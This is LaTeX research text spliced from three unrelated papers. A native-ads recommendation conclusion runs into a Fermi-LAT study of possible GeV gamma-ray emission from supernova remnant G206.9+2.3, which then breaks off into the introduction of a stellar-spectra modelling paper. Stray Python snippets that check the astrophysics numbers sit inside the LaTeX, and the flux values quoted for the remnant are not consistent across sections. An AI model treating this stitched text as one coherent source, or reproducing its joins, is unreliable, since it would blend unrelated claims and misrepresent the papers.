$\bullet$ The progressive training pipeline contributes substantially to the model's performance. Because of the simplicity of ad description, a small disentanglement degree can be sufficient in practice. Besides, a largely simplified ua-interaction network is able to reduce the model's inference cost with very limited loss in quality.
\begin{table}[t]
\centering
\includegraphics[width=1.05\linewidth]{Figures/degree.pdf}
\caption{Degree of Disentanglement on Native Ads \cref{sec:exp-ana-deg}.}
\label{tab:degree}
\end{table}
\section{Conclusion}
In this paper, we proposed the hybrid encoder for efficient and precise native ads recommendation.
With hybrid encoders, the recommendation is made through two consecutive steps: retrieval and ranking.
In the retrieval step, user and ad are independently encoded, based on which candidate ads can be acquired via ANN search.
In the ranking step, user and ad are collaboratively encoded, where ad-related user embeddings and disentangled ad embeddings are generated to select high-quality ads from the given candidates.
Both the retrieval step and the ranking step are light-weighted, which makes the hybrid encoder competitive in working efficiency. Besides, a progressive training pipeline is proposed to optimize the overall performance of the two-stage workflow, where the model learns to ``make candidate retrieval from the global scope'' and ``select the best ads from the given candidates'' step-by-step. The experimental studies demonstrate that the hybrid encoder significantly improves the quality of native ads recommendation compared with the conventional siamese encoder; meanwhile, it achieves comparable recommendation quality to the cross encoder with highly reduced time consumption.
\bibliographystyle{Format/ACM-Reference-Format}
\section{Introduction} \label{sec:intro}
SNR G206.9+2.3 (also known as PKS 0646+06) is an extended radio source classified as a supernova remnant (SNR) \citep{Clark1976}. \citet{Holden1968} stated that the source was detected at 178 MHz.
Because this SNR was close to the Monoceros remnant \citep{Davies1978}, it was regarded as an extended portion of Monoceros \citep{Caswell1970}.
Subsequently, \citet{Day1972} confirmed that this was an independent object based on its 2650 MHz radio maps.
\citet{Clark1976} used a revised flux density and distance relationship to derive a distance of 2.3 kiloparsecs (kpc).
\citet{Davies1978} determined the fine filament structure of SNR G206.9+2.3 in the optical band.
\citet{Nousek1981} provided the two upper limits of X-ray emission of SNR G206.9+2.3 based on HEAO-1 observations.
In addition, they found that the X-ray intensities from the eastern and northern portions of SNR G206.9+2.3 and the Monoceros Nebula all reached local maxima.
\citet{Graham1982} studied the extended features of SNR G206.9+2.3 at 2700 MHz using the Efferlsberg 100-m telescope and found that its 2700 MHz spectrum feature was highly consistent with those of the observed SNRs. In addition, its contours at 2700 MHz were overlaid on the H$\rm \alpha$+[N$_{\rm \uppercase\expandafter{\romannumeral2}}$] map proposed by \citet{Davies1978}. Its distance range was estimated to be 3-5 kpc, and its shell-type morphology at 2700 MHz corresponds to the optical filamentary structure \citep{Graham1982}.
\citet{Fesen1985} presented optical spectrophotometric data of SNR G206.9+2.3
with a 1.3 m telescope at the McGraw-Hill Observatory. They found that the [O$_{\rm \uppercase\expandafter{\romannumeral1}}$] and [O$_{\rm \uppercase\expandafter{\romannumeral2}}$] line strengths are useful for discriminating SNRs from H$_{\rm \uppercase\expandafter{\romannumeral2}}$ regions; moreover, they observed two thin filaments in its southern and northeastern regions.
\citet{Leahy1986} found X-ray emissions of SNR G206.9+2.3 with Einstein. Using a Sedov model, they derived the age of the SNR to be approximately 60000 years and distance from the sun to be approximately 3-11 kpc. They estimated that this SNR was in an adiabatic blast phase based on a derived density of 0.04 cm$^{-3}$.
\citet{Odegard1986} reported that the spectrum of SNR G206.9+2.3 has a turnover between 20.6 MHz and 38 MHz; they believed that this turnover was likely to be caused by free-free absorption of cold and ionized gas.
Using the OAN-SPM 2.1 m telescope, \citet{Ambrocio-Cruz2014} studied the kinematics of SNR G206.9+2.3 in the [SII]$\lambda$ 6717 and 6731 $\rm {\AA}$ emission lines. They estimated its distance from the sun to be 2.2 kpc, the explosion energy of this SNR to be 1.7 $\times$ 10$^{49}$ ergs, and its age to be 6.4 $\times$ 10$^{4}$ years in the radiative phase.
Generally, SNRs are widely regarded as the origin of high-energy cosmic rays \citep[e.g.,][]{Aharonian2004,Ackermann2013}. Astrophysical particles from the cosmic rays of SNRs can be accelerated to above the 100 TeV energy band by diffusive shock acceleration \citep[e.g.,][]{Aharonian2007,Aharonian2011}. In addition, potential reacceleration processes within SNRs can accelerate these particles to the GeV/TeV energy band as well \citep[e.g.,][]{Caprioli2018,Cristofari2019}, which places the spectral energy distribution (SED) of an SNR within the GeV/TeV observation band \citep[e.g.,][]{Zhang2007,Morlino2012,Tang2013}.
Thus far, 24 certified SNRs and 19 SNR candidates have been included in the fourth Fermi catalog \citep{4FGL}.
Previously,
\citet{Acero2016b} did not find significant $\gamma$-ray radiation with Fermi Large Area Telescope (Fermi-LAT) for SNR G206.9+2.3.
With the accumulation of photon events, our preliminary exploration found likely GeV $\gamma$-ray emission at the location of SNR G206.9+2.3 by checking its test statistic (TS) maps, which strongly encouraged us to further investigate the GeV features and likely origin of the SNR G206.9+2.3 region. This is of great significance for exploring the unknown origin of cosmic rays and the acceleration limit of particles within SNRs in the future.
The remainder of this paper is organized as follows: the data reduction is introduced in Section 2; the process of source detection is presented in Section 3; the likely origins of SNR G206.9+2.3 and its GeV features are discussed and summarized in Section 4.
\section{Data Preparation} \label{sec:data-reduction}
A binned likelihood tutorial\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/scitools/binned{\_}likelihood{\_}tutorial.html} was used in this analysis.
Fermitool of version {\tt v11r5p3}\footnote{http://fermi.gsfc.nasa.gov/ssc/data/analysis/software/} was utilized in all subsequent analyses.
The photon events class with evclass = 128 and evtype = 3 and the instrumental response function (IRF) of ``P8R3{\_}SOURCE{\_}V3'' were selected to analyze the region of interest (ROI) of $20^{\circ}\times 20^{\circ}$, which was centered at the location of (R.A., decl.= 102.17$^{\circ}$, 6.43$^{\circ}$; from SIMBAD\footnote{from http://simbad.u-strasbg.fr/simbad/}).
An energy range of 0.8-500 GeV was selected to maintain a small point spread function (PSF) and decrease the contribution from the galactic and extragalactic diffuse backgrounds.
The observation period ranged from August 4, 2008 (mission elapsed time (MET) 239557427) to December 29, 2020 (MET 630970757). The maximum zenith angle of $90^{\circ}$ was selected to reduce the contribution from the Earth Limb.
The script {\tt make4FGLxml.py}\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/user/} and the latest fourth Fermi catalog \citep[4FGL;][]{4FGL}, gll{\_}psc{\_}v27.fit\footnote{https://fermi.gsfc.nasa.gov/ssc/data/access/lat/10yr{\_}catalog/}, were used to generate a source model file, which included all sources within 30$^{\circ}$ around the SIMBAD location of SNR G206.9+2.3.
A point source with a power-law spectrum\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/scitools/xml{\_}model{\_}defs.html\#powerlaw} was subsequently added to the SIMBAD position of SNR G206.9+2.3 in the source model file to analyze its $\gamma$-ray features. We selected free spectral indexes and normalizations for all sources within the 5$^{\circ}$ range around the SIMBAD position of SNR G206.9+2.3. In addition,
normalizations of the two diffuse background models, the isotropic extragalactic background ({\tt iso{\_}P8R3{\_}SOURCE{\_}V3{\_}v1.txt}) and the galactic diffuse emission ({\tt gll{\_}iem{\_}v07.fits})\footnote{http://fermi.gsfc.nasa.gov/ssc/data/access/lat/BackgroundModels.html.}, were freed as well.
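The observation window quoted above can be sanity-checked by converting the MET interval to years (a plain-Python aside, independent of the Fermitools):

```python
MET_START = 239557427  # 2008 August 4, mission elapsed time in seconds
MET_STOP = 630970757   # 2020 December 29

SECONDS_PER_YEAR = 365.25 * 86400.0  # Julian year

def met_span_years(met_start, met_stop):
    """Elapsed observation baseline in years between two MET values."""
    return (met_stop - met_start) / SECONDS_PER_YEAR

print(round(met_span_years(MET_START, MET_STOP), 1))  # 12.4
```

This matches the 12.4-year light-curve baseline used in the variability analysis.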
\subsection{\rm Source Detection} \label{sec:data-reduction}
A complete TS map of the $\gamma$-ray excess over the background in the SNR G206.9+2.3 region was first generated using {\tt gttsmap}. As shown in panel (a) of Figure \ref{Fig1}, the SIMBAD location of SNR G206.9+2.3 showed significant $\gamma$-ray radiation, with a TS value of 12.27.
To reduce the contribution from the surrounding $\gamma$-ray excess, we added a point source with a power-law spectrum at the location of P1 (R.A., decl.=101.02$^{\circ}$, 5.99$^{\circ}$) to exclude the $\gamma$-ray excess of the local maximum in the TS map for all subsequent analyses. Significant $\gamma$-ray radiation remained at the SNR position and was more prominent than at other locations in the 2.6$^{\circ}$ $\times$2.6$^{\circ}$ region, as shown in panel (b) of Figure \ref{Fig1}.
Further, we excluded the emission at the SIMBAD position of SNR G206.9+2.3 to examine probable $\gamma$-ray residual radiation near its location; however, we did not find any probable sources, as shown in panel (c) of Figure \ref{Fig1}. The $\gamma$-ray radiation of SNR G206.9+2.3 still existed and remained significant, with a TS value of 10.87.
Furthermore, we calculated the best-fit position of the $\gamma$-ray radiation (R.A., decl. = 102.24$^{\circ}$, 6.52$^{\circ}$), with a 1$\sigma$ error circle of 0.14$^{\circ}$, using {\tt gtfindsrc}; we found that the SIMBAD position is within the 1$\sigma$ error circle of the best-fit location. Moreover, the radio contours of SNR G206.9+2.3 from the Effelsberg 100-m telescope \citep{Reich1997} overlap with the region within the 2$\sigma$ error circle. Therefore, we suggest that the discovered $\gamma$-ray source is likely to be a counterpart of SNR G206.9+2.3, as shown in Figure \ref{Fig2}.
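The positional agreement can be checked with a small-angle separation estimate (a sketch using the flat-sky approximation, which is adequate for these sub-degree offsets):

```python
import math

def angular_separation_deg(ra1, dec1, ra2, dec2):
    """Approximate sky separation in degrees: RA offset scaled by cos(dec),
    then combined in quadrature with the declination offset."""
    dra = (ra2 - ra1) * math.cos(math.radians(0.5 * (dec1 + dec2)))
    return math.hypot(dra, dec2 - dec1)

# SIMBAD position vs. the gtfindsrc best-fit position quoted in the text
sep = angular_separation_deg(102.17, 6.43, 102.24, 6.52)
print(round(sep, 3))  # 0.114 -> inside the 0.14 deg (1 sigma) error circle
```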
Subsequently, the $\gamma$-ray spatial distribution of SNR G206.9+2.3 in the 0.8-500 GeV band was tested using the uniform disk and two-dimensional (2D) Gaussian models\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/scitools/xml{\_}model{\_}defs.html\#MapCubeFunction}.
Here, we used different radii and $\sigma$, ranging from 0.05$^{\circ}$ to 1$^{\circ}$ with a step of 0.05$^{\circ}$, to test results from these models. We calculated the values of TS$_{\rm ext}$, defined as 2log($L_{\rm ext}$/$L_{\rm ps}$), where $L_{\rm ps}$ and $L_{\rm ext}$ are the maximum likelihood values from a point source and an extended source, respectively.
The maximum values of TS$_{\rm ext}$ from the uniform disk and 2D Gaussian models were close to 4 and 3, respectively.
Here, we present the best-fit results with the largest TS values from the two spatial models in Table \ref{table1}.
These results suggest a certain degree of spatial extension of the GeV $\gamma$-ray emission from the SNR G206.9+2.3 region.
Therefore, we chose the uniform disk model as the best-fit spatial model of the observed signal for the subsequent spectral and timing analyses\footnote{Since the real spatial distribution of the gamma rays from this SNR is unknown, and this object is relatively weak at present, we believe that such a substitution is valuable for this study \citep[e.g.,][]{Feng2019}.}.
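The TS$_{\rm ext}$ values quoted in Table 1 follow directly from its $-$log(Likelihood) column, since 2log($L_{\rm ext}$/$L_{\rm ps}$) equals twice the difference of the tabulated values:

```python
def ts_ext(neg_logL_point, neg_logL_extended):
    """TS_ext = 2 log(L_ext / L_ps), written in terms of the tabulated
    -log(likelihood) values of the point-source and extended-source fits."""
    return 2.0 * (neg_logL_point - neg_logL_extended)

# -log(likelihood) values from Table 1 (0.8-500 GeV fits)
print(round(ts_ext(256046.27, 256044.60), 2))  # 3.34 (2D Gaussian)
print(round(ts_ext(256046.27, 256044.36), 2))  # 3.82 (uniform disk; 3.83 in the table after rounding)
```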
To check the significance of this signal, we subsequently tested three other TS maps above 0.7 GeV, with an increment of 0.1 GeV. We found that the $\gamma$-ray residual radiation of SNR G206.9+2.3 is still more significant than other locations within the $2.6^{\circ}\times 2.6^{\circ}$ region, as shown in Figure \ref{Fig3}.
Here, we present the corresponding best-fit results for SNR G206.9+2.3 in the other three energy bands with the three spatial models in Table \ref{table2}. We found that their TS values were $>$9. Therefore, we conclude that a new GeV source exists in this region.
Although this source is weaker than most sources in 4FGL thus far, we cannot deny the authenticity of this GeV signal. For weak GeV sources with TS$<$25, Fermi-LAT data points with TS values $>$4 can currently be regarded as credible \citep[e.g.,][]{Xing2016,Xi2020b,Xiang2021a}. Based on SNR evolution, the age of SNR G206.9+2.3 is approximately 6.4 $\times$10$^{4}$ years \citep{Ambrocio-Cruz2014}, and it may be at a late evolution stage \citep{Guo2017}.
If SNR G206.9+2.3 has entered the radiative cooling phase, then as the velocity of the shock wave continuously slows down, the post-shock material will rapidly cool, and the high-energy particles inside the SNR will lose most of their energy through radiation; meanwhile, the SNR may be in a weak state above 1 GeV \citep{Cox1972,Blondin1998,Brantseg2013}.
For the old SNR G206.9+2.3, we thought that a low photon flux and TS value were therefore likely at present; thus, we suggested that the new GeV source is likely to be a counterpart of SNR G206.9+2.3.
\begin{table}[!h]
\begin{center}
\caption{The best-fit results for SNR G206.9+2.3 from different spatial models in 0.8-500 GeV band}
\begin{tabular}{lcccccccc}
\hline\noalign{\smallskip}
Spatial Model & Radius ($\sigma$) & Spectral Index & Photon Flux & -log(Likelihood) & TS$_{\rm ext}$ \\
 & (degree) & & ($\rm 10^{-10}$ ph cm$^{-2}$ s$^{-1}$) & & \\
\hline\noalign{\smallskip}
Point source & ... & 3.35$\pm$0.56 & 3.66$\pm$1.21 & 256046.27 & - \\
2D Gaussian & 0.15$^{\circ}$ & 2.84$\pm$0.41 & 3.08$\pm$0.87 & 256044.60 & 3.34 \\
uniform disk & 0.25$^{\circ}$ & 2.81$\pm$0.39 & 4.48$\pm$1.30 & 256044.36 & 3.83 \\
\noalign{\smallskip}\hline
\end{tabular}
\label{table1}
\end{center}
\end{table}
\begin{table}[!h]
\scriptsize
\begin{center}
\caption[]{The best-fit parameters of SNR G206.9+2.3 for three different energy ranges}
\begin{tabular}{lclclclclclclc}
\hline\noalign{\smallskip}
\hline\noalign{\smallskip}
Energy Range & Photon Flux & Spectral Model & $\Gamma$ & TS Value \\
 & ($10^{-10}$ ph cm$^{-2}$ s$^{-1}$) & & & \\
\hline\noalign{\smallskip}
\multicolumn{5}{c}{point source model} \\
\hline\noalign{\smallskip}
700 MeV - 500 GeV & $3.74\pm1.41$ & PowerLaw & $2.96\pm0.42$ & 9.01 \\
900 MeV - 500 GeV & $2.97\pm1.02$ & PowerLaw & $3.49\pm0.71 $ & 10.00 \\
1000 MeV - 500 GeV & $2.60\pm0.88$ & PowerLaw & $3.74\pm0.80$ & 10.32 \\
\hline\noalign{\smallskip}
\multicolumn{5}{c}{uniform disk model} \\
\hline\noalign{\smallskip}
700 MeV - 500 GeV & $5.00\pm1.52$ & PowerLaw & $2.67\pm0.31$ & 14.29 \\
900 MeV - 500 GeV & $3.61\pm1.11$ & PowerLaw & $2.74\pm0.38 $ & 13.71 \\
1000 MeV - 500 GeV & $3.19\pm0.98$ & PowerLaw & $2.90\pm0.46$ & 13.13 \\
\hline\noalign{\smallskip}
\multicolumn{5}{c}{2D Gaussian model} \\
\hline\noalign{\smallskip}
700 MeV - 500 GeV & $5.20\pm 1.58$ & PowerLaw & $2.69\pm0.33$ & 13.94 \\
900 MeV - 500 GeV & $3.74\pm1.14$ & PowerLaw & $ 2.77\pm0.40$ & 13.21 \\
1000 MeV - 500 GeV & $3.30\pm1.00$ & PowerLaw & $2.94\pm0.50$ & 12.67 \\
\hline\noalign{\smallskip}
\end{tabular}
\label{table2}
\end{center}
\end{table}
\begin{figure*}[!h]
\begin{minipage}[t]{0.495\linewidth}
\centering
\includegraphics[width=70mm]{fig1.pdf}
\centerline{(\emph{a})}
\end{minipage}%
\begin{minipage}[t]{0.495\textwidth}
\centering
\includegraphics[width=70mm]{fig2.pdf}
\centerline{(\emph{b})}
\end{minipage}%
\vfill
\begin{minipage}[t]{1\linewidth}
\centering
\includegraphics[width=70mm]{fig3.pdf}
\centerline{(\emph{c})}
\end{minipage}%
\caption{
The size of each of the three TS maps is $2.6^{\circ} \times2.6^{\circ}$ with $0.04^{\circ}$ pixels in the 0.8-500 GeV band. A Gaussian function with a kernel of $\sigma =0.3^{\circ}$ was used to smooth them. The SIMBAD location of SNR G206.9+2.3 is marked by a cyan cross. The 68\% and 95\% best-fit position uncertainties of SNR G206.9+2.3 are marked by solid and dashed green circles in each TS map, respectively.}
\label{Fig1}
\end{figure*}
\begin{figure}[!h]
\centering
\includegraphics[angle=0,width=110mm,height=100mm]{fig4.pdf} %
\caption{The size of the TS map is $1.6^{\circ} \times 1.6^{\circ}$ with $0.04^{\circ}$ pixels in the 0.8-500 GeV energy band. Green contours are from the radio observations of the Effelsberg 100-m telescope \citep{Reich1997}.
For other general descriptions, please refer to Figure \ref{Fig1}.
}
\label{Fig2}
\end{figure}
\begin{figure*}[!h]
\begin{minipage}[t]{0.495\linewidth}
\centering
\includegraphics[width=66mm]{tsmap700.pdf}
\centerline{(\emph{a})}
\end{minipage}%
\begin{minipage}[t]{0.495\linewidth}
\centering
\includegraphics[width=70mm]{tsmap900.pdf}
\centerline{(\emph{b})}
\end{minipage}%
\begin{minipage}[t]{1\linewidth}
\centering
\includegraphics[width=70mm]{tsmap1000.pdf}
\centerline{(\emph{c})}
\end{minipage}%
\caption{Three TS maps in different energy bands.
For other general descriptions, please refer to Figure \ref{Fig1}.
}
\label{Fig3}
\end{figure*}
\subsection{Spectral Energy Distribution}
In this analysis, we generated the spectral energy distribution (SED) with four equally logarithmic energy bins for SNR G206.9+2.3 in the 0.2-500 GeV band.
We found that the photon flux of the global fit is (1.19$\pm$0.59)$\times$ 10$^{-9}$ ph cm$^{-2}$ s$^{-1}$, and its spectral index is $2.22\pm 0.19$.
Each energy bin of its SED was fitted separately using the binned-likelihood method.
For the energy bins with TS values $>$ 4, we calculated the systematic uncertainties from the effective area using the bracketing Aeff method\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/scitools/Aeff{\_}Systematics.html}. For the energy bins with TS values $<$ 4, we assigned upper limits at the 95\% confidence level, as shown in Figure \ref{Fig4}. The best-fit results for each bin are presented in Table \ref{table3}.
\begin{table}[!h]
\begin{center}
\caption{The best-fit results of each energy bin of SNR G206.9+2.3}
\begin{tabular}{lcclclclc}
\hline\noalign{\smallskip}
E & Band & $E^{2}dN(E)/dE$ & TS \\
(GeV) & (GeV) & ($10^{-13}$ erg cm$^{-2}$ s$^{-1}$) & \\
\hline\noalign{\smallskip}
0.53 & 0.2-1.41 & 9.29 & 0.0 \\
3.76 & 1.41-10.00 & 4.00$\pm$1.56$^{+0.19}_{-0.21}$ & 7.45 \\
26.59 & 10.00-70.71 & 2.81$\pm$1.63$^{+0.62}_{-0.19}$ & 4.66 \\
188.03 & 70.71-500 & 3.84 & 0.0 \\
\noalign{\smallskip}\hline
\end{tabular}
\label{table3}
\end{center}
\textbf{Note}:
The two uncertainties on the second and third energy fluxes are the statistical and systematic ones, respectively.
The other energy fluxes are upper limits at the 95\% confidence level.
\end{table}
\begin{figure}[!h]
\centering
\includegraphics[width=\textwidth, angle=0, scale=0.6]{fig8.pdf}
\caption{The blue data points are from this work.
The TS values of the bins with TS $>$ 4 are shown as gray shaded regions.
The black solid line is the best-fit result of a power-law model, and the two red dashed lines show its 1$\sigma$ statistical uncertainties.
The 95\% upper limits are provided for data points with TS values $<$ 4.
}
\label{Fig4}
\end{figure}
\subsection{Variability Analysis}
To decrease the pollution from the galactic diffuse background in the lower energy band, we chose an energy range of 0.5-500 GeV to generate a light curve (LC) with 10 time bins for the region of SNR G206.9+2.3, as shown in Figure \ref{Fig5}. Subsequently, we calculated the value of $\rm TS_{var}$, the variability index defined by \citet{Nolan2012}. We found $\rm TS_{var} \approx 24.42$, which is greater than the threshold of 21.67, suggesting that the LC of this SNR exhibits weak variability with a variability significance level of 2.90$\sigma$.
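In the Gaussian-error limit, the variability index of Nolan et al. (2012) reduces to a chi-square of the binned fluxes about their variance-weighted mean; the 21.67 threshold quoted above is the 99\% confidence point of a chi-square distribution with 9 degrees of freedom (10 bins minus 1). A minimal sketch of that Gaussian approximation (the exact TS$_{\rm var}$ uses the per-bin likelihood profiles):

```python
def ts_var_gaussian(fluxes, sigmas):
    """Gaussian-error approximation to the Nolan et al. (2012) variability
    index: weighted chi-square of the flux bins about their weighted mean."""
    weights = [1.0 / s ** 2 for s in sigmas]
    f_mean = sum(w * f for w, f in zip(weights, fluxes)) / sum(weights)
    return sum(w * (f - f_mean) ** 2 for w, f in zip(weights, fluxes))

# A constant light curve is non-variable by construction
print(ts_var_gaussian([1.0, 1.0, 1.0], [0.1, 0.1, 0.1]))  # 0.0
```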
\begin{figure}[!h]
\centering
\includegraphics[angle=0,width=150mm,height=80mm]{LC10.pdf} %
\caption{The panel shows 12.4 years of the LC with 10 time bins for SNR G206.9+2.3 in the 0.5-500 GeV band.
The upper limits of the 95\% confidence level are calculated for the time bins of TS values $<$ 4. The TS values are represented by gray shaded areas for the time bins with TS values $>$ 4.
}
\label{Fig5}
\end{figure}
\section{Discussion and Conclusion}
\begin{table*}[!h]
\caption{Fit Parameters of the Leptonic and Hadronic Models}
\begin{center}
\begin{tabular}{lcccccc}
\hline\noalign{\smallskip}
Model Name & $n_{\rm gas}$ & $\alpha$ & $E_{\rm cutoff}$ & $W_{\rm e}$ (or $W_{\rm p}$) \\
& (cm$^{-3}$) & & (TeV) & (erg) \\
\hline\noalign{\smallskip}
Leptonic model & --- & 1.50 & 0.76 & 1.04$\times 10^{47}$ \\
\noalign{\smallskip}\hline
Hadronic model & 0.1 & 2.30 & 11.82 & 1.13 $\times 10^{50}$ \\
\hline\noalign{\smallskip}
\end{tabular}
\end{center}
\label{Table4}
Note: Here, for the distance and gas density of SNR G206.9+2.3, we assumed 2.2 kpc and 0.1 cm$^{-3}$ from \citet{Ambrocio-Cruz2014}, respectively. Particle energies $>$ 1 GeV were used to calculate the values of $W_{\rm e}$ and $W_{\rm p}$.
\end{table*}
At the beginning, we found that this $\gamma$-ray emission retained TS values $>$9 in different energy bands after reducing the $\gamma$-ray contamination from the surrounding significant residual radiation, so we suggested that it is a real GeV $\gamma$-ray source. We then found that the new $\gamma$-ray source is located at the position of SNR G206.9+2.3;
the GeV region of SNR G206.9+2.3 coincides with the radio region from the Effelsberg 100-m telescope.
Using the uniform disk model, we found
its photon flux to be $\rm (3.68\pm 1.21)\times 10^{-10}$ $\rm ph\ cm^{-2}\ s^{-1}$ with a spectral index of $2.22\pm 0.19$ in the 0.2-500 GeV energy band; the value of the spectral index is close to the average value of 2.15 for the 43 SNRs and SNR candidates in 4FGL \citep{4FGL}.
In addition, we studied the spectral properties in other high-energy bands and found that the higher the energy band, the softer the spectral index, as shown in Table \ref{table2}.
For the old SNR G206.9+2.3, the particles inside may be in a late stage of evolution. At this stage, as the SNR shock wave continues to slow down, the high-energy particles inside will lose most of their energy through radiation, which likely makes its GeV spectrum soft in the energy range of E$>$1 GeV \citep{Cox1972,Blondin1998,Brantseg2013}.
In addition, other old SNRs, e.g., IC 443, W 44, and W 51C, also have ages above 10000 years, and their $\gamma$-ray spectra also show this soft property \citep{Guo2017}; the spectral property of SNR G206.9+2.3 is thus similar to those of currently observed old SNRs.
\citet{Tang2013} and \citet{Zeng2019} summarized the relationship between the spectral cut-off energy ($E_{\rm cut-off}$) and SNR age: $E_{\rm cut-off}$ gradually decreases above 10$^{4}$ yr, which means that the high-energy particles inside an SNR will gradually cool. Therefore, the cooling of the internal particles likely leaves the present-day SNR G206.9+2.3 in a weak state, with a low photon flux and TS value.
Next, we studied its 12.4 years of LC and found weak variability with a significance level of 2.90$\sigma$. As shown in Figure \ref{Fig5}, the TS values of the third and the ninth bins are higher than those of the other bins. We therefore investigated other likely GeV candidates within the 2$\sigma$ error circle using SIMBAD, especially common active galactic nuclei (AGN) or AGN candidates, but we did not find a likely candidate. Therefore, we thought that the weak variability of this LC likely originated from SNR G206.9+2.3 itself, similar to the newly discovered Supernova 2004dj \citep{Xi2020a,Ajello2020}.
Leptonic and hadronic origins are widely used to explain the GeV $\gamma$-ray radiation of SNRs in the Milky Way \citep[e.g.,][]{Zeng2017,Zeng2019}.
The former is generally considered to be caused by inverse Compton scattering, and the latter is mainly due to the decay of neutral pions ($\pi^{0}$) produced in inelastic proton-proton collisions.
For the hadronic origin, OH (1720 MHz) maser emission is considered to be convincing evidence of the interaction of SNRs with molecular clouds. However, \citet{Frail1996} did not find significant OH maser emission from the SNR G206.9+2.3 region.
In addition, \citet{Su2017b} made detailed observations of the CO molecular cloud around this SNR with the 13.7 m millimeter-wavelength telescope of the Purple Mountain Observatory.
Although they did not find a wide CO molecular line from this region, this SNR was located in a molecular cavity at approximately 15 km s$^{-1}$; a certain number of CO molecular clouds were distributed around it, which implied a likely association between the surrounding CO molecular gas and the SNR.
\begin{figure}[!h]
\centering
\includegraphics[width=\textwidth, angle=0,width=90mm]{had_lep.pdf}
\caption{Fitting results of the leptonic and hadronic models. The green solid line represents the hadronic component from inelastic proton-proton collisions, and the red solid line represents the leptonic component from inverse Compton scattering.
}
\label{Fig6}
\end{figure}
Based on the aforementioned two kinds of origins, here we used a simple steady-state model provided by NAIMA \citep[][and references therein]{Zabalza2015} to explain its SED with a power-law particle distribution with an exponential cutoff, as was done by \citet{Xiang2021a}.
We found that these two types of origins can explain the GeV SED of SNR G206.9+2.3, as shown in Figure \ref{Fig6}. The relevant fitting parameters are presented in Table \ref{Table4}.
For the leptonic fitting result, we found that an index of $\alpha$=1.5 is consistent with the average result of the four shell-type SNRs (including RX J1713.7-3946, RX J0852.0-4622, RCW 86, and HESS J1731-347; refer to \citet{Acero2015b}). Moreover, we found that the electron energy budget $W_{\rm e}$($>$ 1 GeV) $\sim 10^{47}$ erg is in good agreement with that of \citet{Acero2015b}, which indicates that the observed radiation is probably of leptonic origin.
For the hadronic fitting result, we found that its index of $\alpha$=2.3 is consistent with the average result for SNRs interacting with molecular clouds (SNR-MCs; including IC 443, W 44, W 51C, W 49B, and Puppis A; refer to \citet{Xiang2021a}). Furthermore, the proton energy budget $W_{\rm p}$($>$ 1 GeV) is within the range of 10$^{49}$-10$^{50}$ erg found for SNR-MCs by \citet{Xiang2021a}, which indicates that a hadronic origin of the radiation is also likely.
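The energy budgets above amount to integrating $E\,N(E)$ over the fitted particle distribution, $N(E) \propto E^{-\alpha}\exp(-E/E_{\rm cutoff})$, for $E > 1$ GeV. A back-of-the-envelope numerical sketch (not the NAIMA fit itself; the absolute normalization, which sets the $10^{47}$-$10^{50}$ erg scale, is left here as a free parameter):

```python
import math

def energy_budget(alpha, e_cut, e_min=1.0, e_max=1.0e4, n=2000, norm=1.0):
    """Integral of E*N(E) dE above e_min for N(E) = norm * E**-alpha * exp(-E/e_cut)
    (energies in GeV), via trapezoidal integration on a log-spaced grid."""
    lo, hi = math.log(e_min), math.log(e_max)
    dx = (hi - lo) / (n - 1)
    xs = [lo + i * dx for i in range(n)]
    # substituting x = ln E turns E*N(E) dE into E**2 * N(E) dx
    ys = [norm * math.exp((2.0 - alpha) * x - math.exp(x) / e_cut) for x in xs]
    return dx * (sum(ys) - 0.5 * (ys[0] + ys[-1]))

# sanity check: alpha = 2 with a negligible cutoff gives the integral of 1/E = ln(e_max)
print(round(energy_budget(2.0, 1.0e12, e_max=100.0), 3))  # 4.605
```

With the fitted $\alpha = 2.3$ and $E_{\rm cutoff} = 11.82$ TeV (11820 GeV) from Table 4, the same integral times the appropriate normalization (and 1 GeV $\approx 1.602\times 10^{-3}$ erg) would return $W_{\rm p}$.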
Based on the aforementioned analyses, we propose that the new $\gamma$-ray source is likely to be a counterpart of SNR G206.9+2.3.
More observational data from different wavebands are required to further reveal the origin of the $\gamma$-ray emission from the SNR G206.9+2.3 region in the future (e.g., continuous observations of Fermi-LAT).
\section{Acknowledgements}
We sincerely appreciate the support for this work from the National Key R\&D Program of China under Grant No.2018YFA0404204, the National Natural Science Foundation of China (NSFC U1931113, U1738211), the Foundations of Yunnan Province (2018IC059, 2018FY001(-003)), and the Scientific Research Fund of the Yunnan Education Department
(2020Y0039).
\section{Introduction}
\label{intro}
Accurate modelling of stellar spectra for stars with various effective temperatures, surface gravities, and elemental compositions is a key tool in stellar physics. In addition to these fundamental stellar parameters, the emergent spectrum is also affected by stellar magnetic activity. In particular, effects from magnetic activity might significantly complicate characterization of exoplanets and their atmospheres with transit photometry and spectroscopy. Thus, also modelling the impact of stellar surface magnetic fields on emerging stellar spectra have since recently came under the spotlight.
For a long time stellar spectra have been computed using one-dimensional (1D) atmospheric structures calculated under the assumption of radiative equilibrium \citep[with some models also including simple parameterizations of convective flux and overshooting, see, e.g.][]{Boehm_vitense_1964, Kurucz_2005_Atlas12_9, MARCS_descript2008,Phoenix_descript2013}. However, it has been shown that such 1D structures do not necessarily represent average properties of the real three-dimensional (3D) atmospheres \citep{1D_bad}.
Furthermore, 1D modelling does not allow self-consistently accounting for the effects of stellar surface magnetic field on the thermal structure of stellar atmospheres \citep[albeit the semi-empirical approach dates back to][but only applicable to stars with near-solar fundamental parameters]{1975SoPh...42...79S,vernazzaetal1981,1993SSRv...63....1S}. Consequently, while semi-empirical 1D models have been successfully used for simulating the effects of surface magnetic field on the solar spectrum \citep[see][for review]{MPS_AA, TOSCA2013} their extension to modelling magnetised atmospheres of other stars is not straightforward \citep[see, e.g.,][]{Veronika2018}.
